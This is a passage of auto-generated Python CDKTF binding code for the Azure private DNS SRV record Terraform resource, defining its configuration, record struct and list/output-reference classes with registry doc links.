:param name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#name PrivateDnsSrvRecord#name}.
:param record: record block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#record PrivateDnsSrvRecord#record}
:param resource_group_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#resource_group_name PrivateDnsSrvRecord#resource_group_name}.
:param ttl: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#ttl PrivateDnsSrvRecord#ttl}.
:param zone_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#zone_name PrivateDnsSrvRecord#zone_name}.
:param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#id PrivateDnsSrvRecord#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
:param tags: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#tags PrivateDnsSrvRecord#tags}.
:param timeouts: timeouts block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#timeouts PrivateDnsSrvRecord#timeouts}
:param connection:
:param count:
:param depends_on:
:param for_each:
:param lifecycle:
:param provider:
:param provisioners:
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__9fb1f1e98de1ef34a625d65c8f3eea9644cc513e083b9986d0a77faa13946b81)
check_type(argname="argument scope", value=scope, expected_type=type_hints["scope"])
check_type(argname="argument id_", value=id_, expected_type=type_hints["id_"])
config = PrivateDnsSrvRecordConfig(
name=name,
record=record,
resource_group_name=resource_group_name,
ttl=ttl,
zone_name=zone_name,
id=id,
tags=tags,
timeouts=timeouts,
connection=connection,
count=count,
depends_on=depends_on,
for_each=for_each,
lifecycle=lifecycle,
provider=provider,
provisioners=provisioners,
)
jsii.create(self.__class__, self, [scope, id_, config])
@jsii.member(jsii_name="putRecord")
def put_record(
self,
value: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union["PrivateDnsSrvRecordRecord", typing.Dict[builtins.str, typing.Any]]]],
) -> None:
'''
:param value: -
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__3446cdab40dde4b63f2981030819ea9139ec130a78d892342bc655a4b042f787)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
return typing.cast(None, jsii.invoke(self, "putRecord", [value]))
@jsii.member(jsii_name="putTimeouts")
def put_timeouts(
self,
*,
create: typing.Optional[builtins.str] = None,
delete: typing.Optional[builtins.str] = None,
read: typing.Optional[builtins.str] = None,
update: typing.Optional[builtins.str] = None,
) -> None:
'''
:param create: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#create PrivateDnsSrvRecord#create}.
:param delete: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#delete PrivateDnsSrvRecord#delete}.
:param read: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#read PrivateDnsSrvRecord#read}.
:param update: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#update PrivateDnsSrvRecord#update}.
'''
value = PrivateDnsSrvRecordTimeouts(
create=create, delete=delete, read=read, update=update
)
return typing.cast(None, jsii.invoke(self, "putTimeouts", [value]))
@jsii.member(jsii_name="resetId")
def reset_id(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetId", []))
@jsii.member(jsii_name="resetTags")
def reset_tags(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetTags", []))
@jsii.member(jsii_name="resetTimeouts")
def reset_timeouts(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetTimeouts", []))
@jsii.member(jsii_name="synthesizeAttributes")
def _synthesize_attributes(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "synthesizeAttributes", []))
@jsii.python.classproperty
@jsii.member(jsii_name="tfResourceType")
def TF_RESOURCE_TYPE(cls) -> builtins.str:
return typing.cast(builtins.str, jsii.sget(cls, "tfResourceType"))
@builtins.property
@jsii.member(jsii_name="fqdn")
def fqdn(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "fqdn"))
@builtins.property
@jsii.member(jsii_name="record")
def record(self) -> "PrivateDnsSrvRecordRecordList":
return typing.cast("PrivateDnsSrvRecordRecordList", jsii.get(self, "record"))
@builtins.property
@jsii.member(jsii_name="timeouts")
def timeouts(self) -> "PrivateDnsSrvRecordTimeoutsOutputReference":
return typing.cast("PrivateDnsSrvRecordTimeoutsOutputReference", jsii.get(self, "timeouts"))
@builtins.property
@jsii.member(jsii_name="idInput")
def id_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "idInput"))
@builtins.property
@jsii.member(jsii_name="nameInput")
def name_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "nameInput"))
@builtins.property
@jsii.member(jsii_name="recordInput")
def record_input(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]]]:
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]]], jsii.get(self, "recordInput"))
@builtins.property
@jsii.member(jsii_name="resourceGroupNameInput")
def resource_group_name_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "resourceGroupNameInput"))
@builtins.property
@jsii.member(jsii_name="tagsInput")
def tags_input(self) -> typing.Optional[typing.Mapping[builtins.str, builtins.str]]:
return typing.cast(typing.Optional[typing.Mapping[builtins.str, builtins.str]], jsii.get(self, "tagsInput"))
@builtins.property
@jsii.member(jsii_name="timeoutsInput")
def timeouts_input(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, "PrivateDnsSrvRecordTimeouts"]]:
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, "PrivateDnsSrvRecordTimeouts"]], jsii.get(self, "timeoutsInput"))
@builtins.property
@jsii.member(jsii_name="ttlInput")
def ttl_input(self) -> typing.Optional[jsii.Number]:
return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "ttlInput"))
@builtins.property
@jsii.member(jsii_name="zoneNameInput")
def zone_name_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "zoneNameInput"))
@builtins.property
@jsii.member(jsii_name="id")
def id(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "id"))
@id.setter
def id(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__28077eb04d7bb831db97de19877063bc0a999bf6b52e0aee568c8af46a5b07b0)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "id", value)
@builtins.property
@jsii.member(jsii_name="name")
def name(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "name"))
@name.setter
def name(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__89537ab7de0e19eeb9b414bb4e7d2653bf427cca6ba3a133ef9dae2b5c515f76)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "name", value)
@builtins.property
@jsii.member(jsii_name="resourceGroupName")
def resource_group_name(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "resourceGroupName"))
@resource_group_name.setter
def resource_group_name(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__10431d6b61873cfd9f69121ea484514edfb955d74a54403fd37f6f9c04206925)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "resourceGroupName", value)
@builtins.property
@jsii.member(jsii_name="tags")
def tags(self) -> typing.Mapping[builtins.str, builtins.str]:
return typing.cast(typing.Mapping[builtins.str, builtins.str], jsii.get(self, "tags"))
@tags.setter
def tags(self, value: typing.Mapping[builtins.str, builtins.str]) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__09e59969cdfaeee04bee49b9bac92f2b9312bc265413607b8b3b422291b8bb96)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "tags", value)
@builtins.property
@jsii.member(jsii_name="ttl")
def ttl(self) -> jsii.Number:
return typing.cast(jsii.Number, jsii.get(self, "ttl"))
@ttl.setter
def ttl(self, value: jsii.Number) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__386b88e0b5003615ad7be07742b24369d9154bddd8cab1432bbf663646b16017)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "ttl", value)
@builtins.property
@jsii.member(jsii_name="zoneName")
def zone_name(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "zoneName"))
@zone_name.setter
def zone_name(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__f1b8337fbac54d363e17fa332d7e7ce3d53c5de29bd61e998375788cff5645b0)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "zoneName", value)
@jsii.data_type(
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordConfig",
jsii_struct_bases=[_cdktf_9a9027ec.TerraformMetaArguments],
name_mapping={
"connection": "connection",
"count": "count",
"depends_on": "dependsOn",
"for_each": "forEach",
"lifecycle": "lifecycle",
"provider": "provider",
"provisioners": "provisioners",
"name": "name",
"record": "record",
"resource_group_name": "resourceGroupName",
"ttl": "ttl",
"zone_name": "zoneName",
"id": "id",
"tags": "tags",
"timeouts": "timeouts",
},
)
class PrivateDnsSrvRecordConfig(_cdktf_9a9027ec.TerraformMetaArguments):
def __init__(
self,
*,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
name: builtins.str,
record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union["PrivateDnsSrvRecordRecord", typing.Dict[builtins.str, typing.Any]]]],
resource_group_name: builtins.str,
ttl: jsii.Number,
zone_name: builtins.str,
id: typing.Optional[builtins.str] = None,
tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
timeouts: typing.Optional[typing.Union["PrivateDnsSrvRecordTimeouts", typing.Dict[builtins.str, typing.Any]]] = None,
) -> None:
'''
:param connection:
:param count:
:param depends_on:
:param for_each:
:param lifecycle:
:param provider:
:param provisioners:
:param name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#name PrivateDnsSrvRecord#name}.
:param record: record block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#record PrivateDnsSrvRecord#record}
:param resource_group_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#resource_group_name PrivateDnsSrvRecord#resource_group_name}.
:param ttl: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#ttl PrivateDnsSrvRecord#ttl}.
:param zone_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#zone_name PrivateDnsSrvRecord#zone_name}.
:param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#id PrivateDnsSrvRecord#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
:param tags: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#tags PrivateDnsSrvRecord#tags}.
:param timeouts: timeouts block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#timeouts PrivateDnsSrvRecord#timeouts}
'''
if isinstance(lifecycle, dict):
lifecycle = _cdktf_9a9027ec.TerraformResourceLifecycle(**lifecycle)
if isinstance(timeouts, dict):
timeouts = PrivateDnsSrvRecordTimeouts(**timeouts)
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__37d28774e61198a32450196eeddf0acf6401d5b3aa85494d27b805561522c56c)
check_type(argname="argument connection", value=connection, expected_type=type_hints["connection"])
check_type(argname="argument count", value=count, expected_type=type_hints["count"])
check_type(argname="argument depends_on", value=depends_on, expected_type=type_hints["depends_on"])
check_type(argname="argument for_each", value=for_each, expected_type=type_hints["for_each"])
check_type(argname="argument lifecycle", value=lifecycle, expected_type=type_hints["lifecycle"])
check_type(argname="argument provider", value=provider, expected_type=type_hints["provider"])
check_type(argname="argument provisioners", value=provisioners, expected_type=type_hints["provisioners"])
check_type(argname="argument name", value=name, expected_type=type_hints["name"])
check_type(argname="argument record", value=record, expected_type=type_hints["record"])
check_type(argname="argument resource_group_name", value=resource_group_name, expected_type=type_hints["resource_group_name"])
check_type(argname="argument ttl", value=ttl, expected_type=type_hints["ttl"])
check_type(argname="argument zone_name", value=zone_name, expected_type=type_hints["zone_name"])
check_type(argname="argument id", value=id, expected_type=type_hints["id"])
check_type(argname="argument tags", value=tags, expected_type=type_hints["tags"])
check_type(argname="argument timeouts", value=timeouts, expected_type=type_hints["timeouts"])
self._values: typing.Dict[builtins.str, typing.Any] = {
"name": name,
"record": record,
"resource_group_name": resource_group_name,
"ttl": ttl,
"zone_name": zone_name,
}
if connection is not None:
self._values["connection"] = connection
if count is not None:
self._values["count"] = count
if depends_on is not None:
self._values["depends_on"] = depends_on
if for_each is not None:
self._values["for_each"] = for_each
if lifecycle is not None:
self._values["lifecycle"] = lifecycle
if provider is not None:
self._values["provider"] = provider
if provisioners is not None:
self._values["provisioners"] = provisioners
if id is not None:
self._values["id"] = id
if tags is not None:
self._values["tags"] = tags
if timeouts is not None:
self._values["timeouts"] = timeouts
@builtins.property
def connection(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]]:
'''
:stability: experimental
'''
result = self._values.get("connection")
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]], result)
@builtins.property
def count(
self,
) -> typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]]:
'''
:stability: experimental
'''
result = self._values.get("count")
return typing.cast(typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]], result)
@builtins.property
def depends_on(
self,
) -> typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]]:
'''
:stability: experimental
'''
result = self._values.get("depends_on")
return typing.cast(typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]], result)
@builtins.property
def for_each(self) -> typing.Optional[_cdktf_9a9027ec.ITerraformIterator]:
'''
:stability: experimental
'''
result = self._values.get("for_each")
return typing.cast(typing.Optional[_cdktf_9a9027ec.ITerraformIterator], result)
@builtins.property
def lifecycle(self) -> typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle]:
'''
:stability: experimental
'''
result = self._values.get("lifecycle")
return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle], result)
@builtins.property
def provider(self) -> typing.Optional[_cdktf_9a9027ec.TerraformProvider]:
'''
:stability: experimental
'''
result = self._values.get("provider")
return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformProvider], result)
@builtins.property
def provisioners(
self,
) -> typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]]:
'''
:stability: experimental
'''
result = self._values.get("provisioners")
return typing.cast(typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]], result)
@builtins.property
def name(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#name PrivateDnsSrvRecord#name}.'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def record(
self,
) -> typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]]:
'''record block.
Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#record PrivateDnsSrvRecord#record}
'''
result = self._values.get("record")
assert result is not None, "Required property 'record' is missing"
return typing.cast(typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]], result)
@builtins.property
def resource_group_name(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#resource_group_name PrivateDnsSrvRecord#resource_group_name}.'''
result = self._values.get("resource_group_name")
assert result is not None, "Required property 'resource_group_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def ttl(self) -> jsii.Number:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#ttl PrivateDnsSrvRecord#ttl}.'''
result = self._values.get("ttl")
assert result is not None, "Required property 'ttl' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def zone_name(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#zone_name PrivateDnsSrvRecord#zone_name}.'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def id(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#id PrivateDnsSrvRecord#id}.
Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2.
If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
'''
result = self._values.get("id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def tags(self) -> typing.Optional[typing.Mapping[builtins.str, builtins.str]]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#tags PrivateDnsSrvRecord#tags}.'''
result = self._values.get("tags")
return typing.cast(typing.Optional[typing.Mapping[builtins.str, builtins.str]], result)
@builtins.property
def timeouts(self) -> typing.Optional["PrivateDnsSrvRecordTimeouts"]:
'''timeouts block.
Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#timeouts PrivateDnsSrvRecord#timeouts}
'''
result = self._values.get("timeouts")
return typing.cast(typing.Optional["PrivateDnsSrvRecordTimeouts"], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PrivateDnsSrvRecordConfig(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordRecord",
jsii_struct_bases=[],
name_mapping={
"port": "port",
"priority": "priority",
"target": "target",
"weight": "weight",
},
)
class PrivateDnsSrvRecordRecord:
def __init__(
self,
*,
port: jsii.Number,
priority: jsii.Number,
target: builtins.str,
weight: jsii.Number,
) -> None:
'''
:param port: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#port PrivateDnsSrvRecord#port}.
:param priority: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#priority PrivateDnsSrvRecord#priority}.
:param target: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#target PrivateDnsSrvRecord#target}.
:param weight: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#weight PrivateDnsSrvRecord#weight}.
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__4d8a667e77494c343d5678d6474f7bb0bd136821aed3ef4451ed78c87e84dcba)
check_type(argname="argument port", value=port, expected_type=type_hints["port"])
check_type(argname="argument priority", value=priority, expected_type=type_hints["priority"])
check_type(argname="argument target", value=target, expected_type=type_hints["target"])
check_type(argname="argument weight", value=weight, expected_type=type_hints["weight"])
self._values: typing.Dict[builtins.str, typing.Any] = {
"port": port,
"priority": priority,
"target": target,
"weight": weight,
}
@builtins.property
def port(self) -> jsii.Number:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#port PrivateDnsSrvRecord#port}.'''
result = self._values.get("port")
assert result is not None, "Required property 'port' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def priority(self) -> jsii.Number:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#priority PrivateDnsSrvRecord#priority}.'''
result = self._values.get("priority")
assert result is not None, "Required property 'priority' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def target(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#target PrivateDnsSrvRecord#target}.'''
result = self._values.get("target")
assert result is not None, "Required property 'target' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def weight(self) -> jsii.Number:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#weight PrivateDnsSrvRecord#weight}.'''
result = self._values.get("weight")
assert result is not None, "Required property 'weight' is missing"
return typing.cast(jsii.Number, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PrivateDnsSrvRecordRecord(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class PrivateDnsSrvRecordRecordList(
_cdktf_9a9027ec.ComplexList,
metaclass=jsii.JSIIMeta,
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordRecordList",
):
def __init__(
self,
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
wraps_set: builtins.bool,
) -> None:
'''
:param terraform_resource: The parent resource.
:param terraform_attribute: The attribute on the parent resource this class is referencing.
:param wraps_set: whether the list is wrapping a set (will add tolist() to be able to access an item via an index).
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__e89f47f0bb2cbe75f9a6ed361f7566803e287b63bff302d8ef26eb743be5b2ba)
check_type(argname="argument terraform_resource", value=terraform_resource, expected_type=type_hints["terraform_resource"])
check_type(argname="argument terraform_attribute", value=terraform_attribute, expected_type=type_hints["terraform_attribute"])
check_type(argname="argument wraps_set", value=wraps_set, expected_type=type_hints["wraps_set"])
jsii.create(self.__class__, self, [terraform_resource, terraform_attribute, wraps_set])
@jsii.member(jsii_name="get")
def get(self, index: jsii.Number) -> "PrivateDnsSrvRecordRecordOutputReference":
'''
:param index: the index of the item to return.
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__c2f1f687800e6044c6e4b7ad1f9d433b238c8f2427f64fb30f2e58887a08cd17)
check_type(argname="argument index", value=index, expected_type=type_hints["index"])
return typing.cast("PrivateDnsSrvRecordRecordOutputReference", jsii.invoke(self, "get", [index]))
@builtins.property
@jsii.member(jsii_name="terraformAttribute")
def _terraform_attribute(self) -> builtins.str:
'''The attribute on the parent resource this class is referencing.'''
return typing.cast(builtins.str, jsii.get(self, "terraformAttribute"))
@_terraform_attribute.setter
def _terraform_attribute(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__ffeae467d9ebabdbdc7aea6bc40010a0cffa849eabf29d495bf383aadd197a1f)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "terraformAttribute", value)
@builtins.property
@jsii.member(jsii_name="terraformResource")
def _terraform_resource(self) -> _cdktf_9a9027ec.IInterpolatingParent:
'''The parent resource.'''
return typing.cast(_cdktf_9a9027ec.IInterpolatingParent, jsii.get(self, "terraformResource"))
@_terraform_resource.setter
def _terraform_resource(self, value: _cdktf_9a9027ec.IInterpolatingParent) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__912ffcbadc7002a828ee2f8238a844005fbec384d31975995d00725c1dc68e20)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "terraformResource", value)
@builtins.property
@jsii.member(jsii_name="wrapsSet")
def _wraps_set(self) -> builtins.bool:
'''whether the list is wrapping a set (will add tolist() to be able to access an item via an index).'''
return typing.cast(builtins.bool, jsii.get(self, "wrapsSet"))
@_wraps_set.setter
def _wraps_set(self, value: builtins.bool) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__4e4247ceb672f8669f5ceedb986f44a697976b39c0bab53801f30a8f21e92324)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "wrapsSet", value)
@builtins.property
@jsii.member(jsii_name="internalValue")
def internal_value(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]]:
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]], jsii.get(self, "internalValue"))
@internal_value.setter
def internal_value(
self,
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]],
) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__aea328d42c912241adc8e92da65030e2e45ba9281409430764d363df0eb8920c)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "internalValue", value)
class PrivateDnsSrvRecordRecordOutputReference(
_cdktf_9a9027ec.ComplexObject,
metaclass=jsii.JSIIMeta,
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordRecordOutputReference",
):
def __init__(
self,
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
complex_object_index: jsii.Number,
complex_object_is_from_set: builtins.bool,
) -> None:
'''
:param terraform_resource: The parent resource.
:param terraform_attribute: The attribute on the parent resource this class is referencing.
:param complex_object_index: the index of this item in the list.
:param complex_object_is_from_set: whether the list is wrapping a set (will add tolist() to be able to access an item via an index).
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__eb01a9a53daa586676186a4d734bea38bd257ebaa81da1901024373e6b4c3200)
check_type(argname="argument terraform_resource", value=terraform_resource, expected_type=type_hints["terraform_resource"])
check_type(argname="argument terraform_attribute", value=terraform_attribute, expected_type=type_hints["terraform_attribute"])
check_type(argname="argument complex_object_index", value=complex_object_index, expected_type=type_hints["complex_object_index"])
check_type(argname="argument complex_object_is_from_set", value=complex_object_is_from_set, expected_type=type_hints["complex_object_is_from_set"])
jsii.create(self.__class__, self, [terraform_resource, terraform_attribute, complex_object_index, complex_object_is_from_set])
@builtins.property
@jsii.member(jsii_name="portInput")
def port_input(self) -> typing.Optional[jsii.Number]:
return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "portInput"))
@builtins.property
@jsii.member(jsii_name="priorityInput")
def priority_input(self) -> typing.Optional[jsii.Number]:
return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "priorityInput"))
@builtins.property
@jsii.member(jsii_name="targetInput")
